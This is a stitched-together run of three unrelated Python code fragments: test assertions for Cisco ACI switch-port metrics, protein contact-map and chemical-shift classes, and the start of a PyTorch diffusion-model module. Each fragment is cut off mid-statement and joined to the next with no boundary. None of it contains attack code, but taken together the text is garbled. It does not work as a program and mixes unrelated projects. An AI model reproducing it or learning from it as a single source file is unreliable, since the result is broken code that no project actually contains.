hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/37'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/38'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/39'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/40'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/41'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/42'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/33'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/48'], hostname=hn102) aggregator.assert_metric(metric_name, value=3672.0, tags=tags102 + ['port:eth1/49'], hostname=hn102) aggregator.assert_metric(metric_name, value=100145009.0, tags=tags102 + ['port:eth1/50'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/1'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/2'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/3'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/4'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/15'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/5'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/6'], hostname=hn102) aggregator.assert_metric(metric_name, value=855.0, tags=tags102 + ['port:eth1/7'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/8'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/9'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/10'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/11'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/12'], hostname=hn102) aggregator.assert_metric(metric_name, value=5652770907.0, tags=tags202 + ['port:eth1/1'], hostname=hn202) aggregator.assert_metric(metric_name, value=2224410566.0, tags=tags202 + ['port:eth1/2'], hostname=hn202) aggregator.assert_metric(metric_name, value=3865435435.0, tags=tags201 + ['port:eth1/1'], hostname=hn201) aggregator.assert_metric(metric_name, value=4030471655.0, tags=tags201 + ['port:eth1/2'], hostname=hn201) metric_name = 'cisco_aci.fabric.port.egr_bytes.unicast.cum' aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/43'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/44'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/45'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/46'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/47'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=370475792067.0, tags=tags101 + ['port:eth1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=263131271762.0, tags=tags101 + ['port:eth1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=342315261222.0, tags=tags101 + ['port:eth1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=14238340.0, tags=tags101 + ['port:eth1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=14238340.0, tags=tags101 + ['port:eth1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=242134018.0, tags=tags101 + ['port:eth1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=344482735664.0, tags=tags101 + ['port:eth1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=2375462007802685.0, tags=tags101 + ['port:eth1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=72584223945.0, tags=tags101 + ['port:eth1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=2717547044839.0, tags=tags101 + ['port:eth1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=30785612.0, tags=tags101 + ['port:eth1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=122270987.0, tags=tags101 + ['port:eth1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=913331247.0, tags=tags101 + ['port:eth1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=1918138777.0, tags=tags101 + ['port:eth1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=77293415849.0, tags=tags101 + ['port:eth1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=330426792155.0, tags=tags101 + ['port:eth1/49'], hostname=hn101) aggregator.assert_metric(metric_name, value=302746138922.0, tags=tags101 + ['port:eth1/50'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/13'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/14'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/16'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/17'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/18'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/20'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/21'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/22'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/23'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/24'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/25'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/26'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/27'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/28'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/29'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/30'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/31'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/32'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/34'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/35'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/36'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/37'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/38'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/39'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/40'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/41'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/42'], hostname=hn101) aggregator.assert_metric(metric_name, value=122246714.0, tags=tags102 + ['port:eth1/33'], hostname=hn102) aggregator.assert_metric(metric_name, value=62665015.0, tags=tags102 + ['port:eth1/48'], hostname=hn102) aggregator.assert_metric(metric_name, value=222183688736.0, tags=tags102 + ['port:eth1/49'], hostname=hn102) aggregator.assert_metric(metric_name, value=212143547054.0, tags=tags102 + ['port:eth1/50'], hostname=hn102) aggregator.assert_metric(metric_name, value=134113229564.0, tags=tags102 + ['port:eth1/1'], hostname=hn102) aggregator.assert_metric(metric_name, value=203653209556.0, tags=tags102 + ['port:eth1/2'], hostname=hn102) aggregator.assert_metric(metric_name, value=91067116.0, tags=tags102 + ['port:eth1/3'], hostname=hn102) aggregator.assert_metric(metric_name, value=14238624.0, tags=tags102 + ['port:eth1/4'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/15'], hostname=hn102) aggregator.assert_metric(metric_name, value=7077.0, tags=tags102 + ['port:eth1/17'], hostname=hn102) aggregator.assert_metric(metric_name, value=14238908.0, tags=tags102 + ['port:eth1/5'], hostname=hn102) aggregator.assert_metric(metric_name, value=10568776.0, tags=tags102 + ['port:eth1/6'], hostname=hn102) aggregator.assert_metric(metric_name, value=531249211611.0, tags=tags102 + ['port:eth1/7'], hostname=hn102) aggregator.assert_metric(metric_name, value=172484213872.0, tags=tags102 + ['port:eth1/8'], hostname=hn102) aggregator.assert_metric(metric_name, value=30565216.0, tags=tags102 + ['port:eth1/9'], hostname=hn102) aggregator.assert_metric(metric_name, value=30780750.0, tags=tags102 + ['port:eth1/10'], hostname=hn102) aggregator.assert_metric(metric_name, value=30780464.0, tags=tags102 + ['port:eth1/11'], hostname=hn102) aggregator.assert_metric(metric_name, value=122246714.0, tags=tags102 + ['port:eth1/12'], hostname=hn102) aggregator.assert_metric(metric_name, value=689750718034.0, tags=tags202 + ['port:eth1/1'], hostname=hn202) aggregator.assert_metric(metric_name, value=843245090540.0, tags=tags202 + ['port:eth1/2'], hostname=hn202) aggregator.assert_metric(metric_name, value=694427252279.0, tags=tags201 + ['port:eth1/1'], hostname=hn201) aggregator.assert_metric(metric_name, value=808249335135.0, tags=tags201 + ['port:eth1/2'], hostname=hn201) metric_name = 'cisco_aci.capacity.apic.fabric_node.utilized' aggregator.assert_metric(metric_name, value=0.0, tags=['cisco', 'project:cisco_aci'], hostname='') metric_name = 'cisco_aci.fabric.port.fault_counter.crit' aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/43'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/44'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/45'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/46'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/47'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=1.0, tags=tags101 + ['port:eth1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/13'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/14'], hostname=hn101) aggregator.assert_metric(metric_name, value=1.0, tags=tags101 + ['port:eth1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/16'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/17'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/18'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/20'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/21'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/22'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/23'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/24'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/25'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/26'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/27'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/28'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/29'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/30'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/31'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/32'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/34'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/35'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/36'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/37'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/38'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/39'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/40'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/41'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/42'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/43'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/44'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/45'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/46'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/47'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/49'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/50'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/51'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/52'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/53'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/54'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/13'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/14'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/16'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/17'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/18'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/20'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/21'], hostname=hn101) aggregator.assert_metric(metric_name,
for atom in [atom1, atom2]: if atom not in self._atomset: raise ValueError("No such atom in contact map: {0}".format(atom)) self._connect(atom1, atom2) def _connect(self, atom1, atom2): if atom1 not in self._map: self._map[atom1] = set() self._map[atom1].add(atom2) if atom2 not in self._map: self._map[atom2] = set() self._map[atom2].add(atom1) def connected(self, atom1, atom2): """ Return True if the specified atoms are in contact. @param atom1: first atom @type atom1: L{Atom} @param atom2: second atom @type atom2: L{Atom} """ if atom1 in self._map: return atom2 in self._map[atom1] return False def atom_contacts(self, atom): """ Return all atoms within C{self.cutoff} angstroms of C{atom}. @param atom: anchor atom @type atom: L{Atom} @rtype: frozenset of L{Atom} """ if atom in self._map: return frozenset(self._map[atom]) else: return frozenset() def residue_contacts(self, residue): """ Return all residues, having neighboring atoms within C{self.cutoff} angstroms from any of the C{residue}'s atoms. @param residue: anchor residue @type residue: L{Residue} @rtype: frozenset of L{Residue} """ partners = set() for atom in residue.items: if atom in self._map: for partner in self._map[atom]: partners.add(partner.residue) return frozenset(partners) def position(self, rank, atom_name): """ Compute the location of C{atom} on the contact map. @param rank: residue rank (1-based) @type rank: int @param atom_name: atom name @type atom_name: str @rtype: float """ residue = self._chain.residues[rank] atom = residue.atoms[atom_name] try: return self._coords[residue.rank][atom.name] except KeyError: msg = "No atom {0} at #{1} in contact map: {2}" raise ValueError(msg.format(atom_name, rank, self._coords[residue.rank].values())) def atom_matrix(self): """ Build a 2D binary contact matrix (0=no contact, 1=contact). The order of elements in each dimension will match the order of atoms in the contact map (see L{ContactMap.atoms} and iter(L{ContactMap}). That means, the atoms in each dimension are sorted by residue number first. @deprecated: This method can be removed in future versions @rtype: numpy.array (2D) """ matrix = [] for i, atom1 in enumerate(self.atoms): matrix.append([]) for atom2 in self.atoms: if atom1 in self._map and atom2 in self._map[atom1]: matrix[i].append(1) else: matrix[i].append(0) return numpy.array(matrix) def draw(self, plot, color="black"): """ Visualize this contact map. @param plot: L{csb.io.plots.Chart}'s plot to draw on @type plot: matplotlib.AxesSubplot @param color: pixel color (must be a matplotlib color constant) @type color: str """ x, y = [], [] for atom1 in self.atoms: for atom2 in self.atom_contacts(atom1): pos1 = self.position(atom1.residue.rank, atom1.name) pos2 = self.position(atom2.residue.rank, atom2.name) assert None not in (pos1, pos2), (atom1, atom2) x.append(pos1) y.append(pos2) plot.plot(x, y, color=color, marker=",", linestyle='none') plot.set_xlim(0, self.chain.length) plot.set_ylim(0, self.chain.length) return plot @staticmethod def compare(query, reference, min_distance=0): """ Compare a query contact map against a reference. @type query: L{ContactMap} @type reference: L{ContactMap} @param min_distance: consider only contacts between atoms, separated by the given minimum number of residues @type min_distance: int @return: precision and coverage @rtype: L{ContactMapComparisonInfo} """ if query.chain is not reference.chain: raise ValueError("Contact maps are not comparable") if not query._map and not reference._map: raise ValueError("Can't compare empty contact maps") true_pos = 0.0 false_pos = 0.0 false_neg = 0.0 for a1, a2 in query.contacts: if abs(a1.residue.rank - a2.residue.rank) >= min_distance: if reference.connected(a1, a2): true_pos += 1.0 else: false_pos += 1.0 for a1, a2 in reference.contacts: if abs(a1.residue.rank - a2.residue.rank) >= min_distance: if not query.connected(a1, a2): false_neg += 1.0 try: precision = true_pos / (true_pos + false_pos) coverage = true_pos / (true_pos + false_neg) return ContactMapComparisonInfo(precision, coverage) except ZeroDivisionError: return ContactMapComparisonInfo(0, 0) class ContactMapComparisonInfo(object): def __init__(self, precision, coverage): self.precision = precision self.coverage = coverage class Label(object): """ Utility class for working with chemical shift labels. @param residue: residue type @type residue: L{EnumItem} @param rank: residue position (1-based) @type rank: int @param atom_name: nucleus name @type atom_name: str """ @staticmethod def build(residue_type, position, atom_name): """ Build a new string label by specifying its components. @rtype: str """ return '{0!s}#{1}:{2}'.format(residue_type, position, atom_name) @staticmethod def from_shift(shift): """ Build a new string label from a L{ChemShiftInfo}. @rtype: str """ return Label.build(shift.residue, shift.position, shift.name) @staticmethod def from_atom(atom): """ Build a new string label from an L{Atom}. @rtype: str """ return Label.build(atom.residue.type, atom.residue.rank, atom.name) @staticmethod def match(shift, atom): """ Return True if the labels of a L{ChemShiftInfo} and an L{Atom} match. @rtype: bool """ l = Label.from_shift(shift) r = Label.from_atom(atom) return r == l @staticmethod def get_atom(chain, label): """ Get the L{Atom} in a L{Chain}, designated by a given string label. @rtype: L{Atom} """ dummy, rank, atom = Label.parse(label) return chain.residues[rank].atoms[atom] @staticmethod def parse(label): """ Parse the components of a string nucleus label. @return: (residue, rank, atom) @rtype: 3-tuple """ parts = label.split("#") residue = parts[0] subparts = parts[1].split(":") rank = int(subparts[0]) atom = subparts[1] return (residue, rank, atom) @staticmethod def from_string(label): """ Parse the a string nucleus label and create a new L{Label}. @rtype: L{Label} """ residue, rank, atom = Label.parse(label) return Label(residue, rank, atom) def __init__(self, residue, rank, atom_name): self._residue = residue self._rank = rank self._atom = atom_name @property def residue(self): """ Residue type (a L{ProteinAlphabet} member) """ return self._residue @property def rank(self): """ Residue rank (1-based) """ return self._rank @property def atom_name(self): """ Nucleus name """ return self._atom def __str__(self): return Label.build(self._residue, self._rank, self._atom) class ChemShiftInfo(object): """ Chemical shift struct. @param position: residue rank (1-based) @type position: int @param residue: amino acid type (a member of L{ProteinAlphabet}) @type residue: str or L{EnumItem} @param name: nucleus label @type name: str @param element: nucleus type (a member of L{ChemElements}) @type element: str or L{EnumItem} @param shift: chemical shift value @type shift: float """ def __init__(self, position, residue, name, element, shift): if not isinstance(residue, pu.EnumItem) or residue.enum is not ProteinAlphabet: residue = pu.Enum.parsename(ProteinAlphabet, str(residue)) if not isinstance(element, pu.EnumItem) or element.enum is not ChemElements: element = pu.Enum.parsename(ChemElements, str(element)) self.position = int(position) self.residue = residue self.name = str(name) self.element = element self.shift = float(shift) def clone(self, name): """ Clone the current shift and create a new one with the specified nucleus label. @rtype: L{ChemShiftInfo} """ ni = self return ChemShiftInfo(ni.position, repr(ni.residue), name, repr(ni.element), ni.shift) def __str__(self): return "{0!s}#{1}:{2}".format(self.residue, self.position, self.name) @property def label(self): """ String label representation @rtype: str """ return str(self) class ChemicalShiftNetwork(object): """ Describes a network of covalently connected, chemical shift visible nuclei. @param shifts: chemical shift instances @type shifts: iterable of L{ChemShiftInfo} """ def __init__(self, shifts): self._neighbors = {} labels = {} for cs in shifts: self._neighbors[cs] = set() id = Label.from_shift(cs) labels[id] = cs conn = AtomConnectivity.get() for cs in shifts: for atom_name in conn.connected_atoms(cs.residue, cs.name): target = Label.build(cs.residue, cs.position, atom_name) if target in labels: self.connect(cs, labels[target]) def connect(self, cs1, cs2): """ Connect two nuclei. @param cs1: first chemical shift instance @type cs1: L{ChemShiftInfo} @param cs2: second chemical shift instance @type cs2: L{ChemShiftInfo} """ try: self._neighbors[cs1].add(cs2) self._neighbors[cs2].add(cs1) except KeyError: raise ValueError("Unknown chemical shift") def connected_shifts(self, source, element=None): """ Return an iterator over all covalently connected neuclei to a given C{source}. @param source: source chemical shift @type source: L{ChemShiftInfo} @rtype: iterator of L{ChemShiftInfo} """ if source not in self._neighbors: raise ValueError("No such chemical shift in this network") for cs in self._neighbors[source]: if element is None or cs.element == element: yield cs def __iter__(self): return iter(self._neighbors) class ChemShiftScoringModel(object): """ Chemical shift similarity scoring model. See C{ScoringModel.NUCLEI} for a list of supported chemical shift types. """ NUCLEI = ('CA', 'CB', 'C', 'N', 'HA') def __init__(self): self._pos = {} self._neg = {} self._pos['CA'] = GeneralizedNormal(0.02, 1.32, 1.1) self._neg['CA'] = GeneralizedNormal(-0.08, 4.23, 2.2) self._pos['CB'] = GeneralizedNormal(0.06,
"""Copyright (c) 2020 <NAME>""" import os import math import copy import torch from torch import nn, einsum import torch.nn.functional as F from inspect import isfunction from functools import partial from torch.utils import data from pathlib import Path from torch.optim import Adam from torchvision import transforms, utils from PIL import Image import matplotlib.pyplot as plt import imageio import numpy as np from tqdm import tqdm from einops import rearrange try: from apex import amp APEX_AVAILABLE = True except: APEX_AVAILABLE = False # helpers functions def exists(x): return x is not None def default(val, d): if exists(val): return val return d() if isfunction(d) else d def cycle(dl): while True: for data in dl: yield data def num_to_groups(num, divisor): groups = num // divisor remainder = num % divisor arr = [divisor] * groups if remainder > 0: arr.append(remainder) return arr def loss_backwards(fp16, loss, optimizer, **kwargs): if fp16: with amp.scale_loss(loss, optimizer) as scaled_loss: scaled_loss.backward(**kwargs) else: loss.backward(**kwargs) # small helper modules class EMA(): def __init__(self, beta): super().__init__() self.beta = beta def update_model_average(self, ma_model, current_model): for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()): old_weight, up_weight = ma_params.data, current_params.data ma_params.data = self.update_average(old_weight, up_weight) def update_average(self, old, new): if old is None: return new return old * self.beta + (1 - self.beta) * new class Residual(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, *args, **kwargs): return self.fn(x, *args, **kwargs) + x class SinusoidalPosEmb(nn.Module): def __init__(self, dim): super().__init__() self.dim = dim def forward(self, x): device = x.device half_dim = self.dim // 2 emb = math.log(10000) / (half_dim - 1) emb = torch.exp(torch.arange(half_dim, device=device) * -emb) emb = x[:, None] * emb[None, :] emb = torch.cat((emb.sin(), emb.cos()), dim=-1) return emb class Mish(nn.Module): def forward(self, x): return x * torch.tanh(F.softplus(x)) class Upsample(nn.Module): def __init__(self, dim): super().__init__() self.conv = nn.ConvTranspose2d(dim, dim, 4, 2, 1) def forward(self, x): return self.conv(x) class Downsample(nn.Module): def __init__(self, dim): super().__init__() self.conv = nn.Conv2d(dim, dim, 3, 2, 1) def forward(self, x): return self.conv(x) class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): std = torch.var(x, dim = 